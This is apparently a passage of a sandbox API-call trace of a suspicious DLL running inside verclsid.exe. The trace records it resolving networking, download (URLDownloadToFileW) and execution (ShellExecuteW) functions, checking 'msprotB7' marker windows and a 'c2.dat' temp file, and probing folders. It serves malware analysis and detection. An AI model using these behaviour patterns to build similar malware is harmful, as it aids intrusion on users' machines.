[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1ea8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="gethostbyname") returned 0x7feffcd8df0
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1ea8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="send") returned 0x7feffcd8000
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1ea8d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="connect") returned 0x7feffcd45c0
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1ea8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="recv") returned 0x7fef7311744
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="gethostname") returned 0x7feffcdae20
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1ea8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="inet_ntoa") returned 0x7feffcdd9a0
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1ea8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="ntohs") returned 0x7feffcd1250
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1ea8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSAGetLastError") returned 0x7feffcd1290
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="getpeername") returned 0x7feffcfe450
[0550.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0550.543] GetProcAddress (hModule=0x7fef7310000, lpProcName="getsockname") returned 0x7feffcd9480
[0550.543] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0550.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0550.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1ea8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0550.552] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="ShellExecuteW") returned 0x7fefe50983c
[0550.552] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7feffda0000
[0550.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0550.574] GetProcAddress (hModule=0x7feffda0000, lpProcName="URLDownloadToFileW") returned 0x7feffe395e4
[0550.574] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0550.575] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7fefe210000
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0550.575] GetProcAddress (hModule=0x7fefe210000, lpProcName="StrRetToStrW") returned 0x7fefe221078
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe518660
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1ea8d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe57a274
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHParseDisplayName") returned 0x7fefe574570
[0550.576] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feff780000
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0550.576] GetProcAddress (hModule=0x7feff780000, lpProcName="CoInitialize") returned 0x7feff79a51c
[0550.577] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb670000
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="GetTcpTable") returned 0x7fefb6813ac
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="SetTcpEntry") returned 0x7fefb682fb0
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1ea8d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCreateFile") returned 0x7fefb678250
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1ea8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0550.585] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCloseHandle") returned 0x7fefb677cc0
[0550.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0550.585] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpSendEcho") returned 0x7fefb678340
[0550.585] DisableThreadLibraryCalls (hLibModule=0x2b0000) returned 1
[0550.585] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.585] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x16cb20, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0550.586] DllGetClassObject (rclsid=0x387150*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7feff906cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x16e7f0)
[0550.586] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.587] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0550.587] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x16e3c6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e7d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0550.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x16d2e0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0550.588] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x16e370 | out: lpFindFileData=0x16e370*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x16e390, dwReserved0=0x0, dwReserved1=0x16e3b8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.588] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16e036, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")) returned 0x20
[0550.589] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x16e046 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e7da30, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0550.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x16cf60, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0550.589] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x16dff0 | out: lpFindFileData=0x16dff0*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x16e010, dwReserved0=0x0, dwReserved1=0x16e038, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.589] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0550.589] FindWindowW (lpClassName="msprot-clonB7", lpWindowName=0x0) returned 0x0
[0550.589] GetModuleFileNameW (in: hModule=0x2b0000, lpFilename=0x16e384, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0x52
[0550.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task+") returned 4
[0550.590] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), lpFindFileData=0x16dfe8 | out: lpFindFileData=0x16dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f4eb60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8f4eb60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8f9ae20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x35400, dwReserved0=0x0, dwReserved1=0x16e010, cFileName="B79266.DLL", cAlternateFileName="")) returned 0x3776f0
[0550.590] FileTimeToLocalFileTime (in: lpFileTime=0x16dfec, lpLocalFileTime=0x16e238 | out: lpLocalFileTime=0x16e238) returned 1
[0550.590] FileTimeToSystemTime (in: lpFileTime=0x16e238, lpSystemTime=0x16dfd8 | out: lpSystemTime=0x16dfd8) returned 1
[0550.591] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x16e58c, lpMaximumComponentLength=0x16e588, lpFileSystemFlags=0x16e584, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x16e58c*=0x8443a5af, lpMaximumComponentLength=0x16e588*=0xff, lpFileSystemFlags=0x16e584*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0550.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1117525688", cbMultiByte=10, lpWideCharStr=0x16cfc0, cchWideChar=2047 | out: lpWideCharStr="1117525688") returned 10
[0550.595] LoadLibraryW (lpLibFileName="SHFolder.dll") returned 0x7fefc970000
[0550.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0550.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x1e8c100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderPathW", lpUsedDefaultChar=0x0) returned 16
[0550.728] GetProcAddress (hModule=0x7fefc970000, lpProcName="SHGetFolderPathW") returned 0x7fefc9712c0
[0550.728] SHGetFolderPathW (in: hwnd=0x0, csidl=103, hToken=0x0, dwFlags=0x0, pszPath=0x16e046 | out: pszPath="") returned 0x80070057
[0550.728] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x16e046 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0
[0550.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0550.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x1e7da80, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", lpUsedDefaultChar=0x0) returned 48
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cbMultiByte=48, lpWideCharStr=0x16cf60, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0") returned 48
[0550.739] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\jdownloader 2.0"), lpFindFileData=0x16dff0 | out: lpFindFileData=0x16dff0*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x386a70, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x16e046, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x16e588, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task酀8") returned 4
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task酀8") returned 4
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x16cf20, cchWideChar=2047 | out: lpWideCharStr="1136.dat") returned 8
[0550.740] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x16dfb0 | out: lpFindFileData=0x16dfb0*(dwFileAttributes=0xbe587109, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2c0917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x16e820, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xbe587109, nFileSizeHigh=0x0, nFileSizeLow=0x386a70, dwReserved0=0x0, dwReserved1=0x2cda8c, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
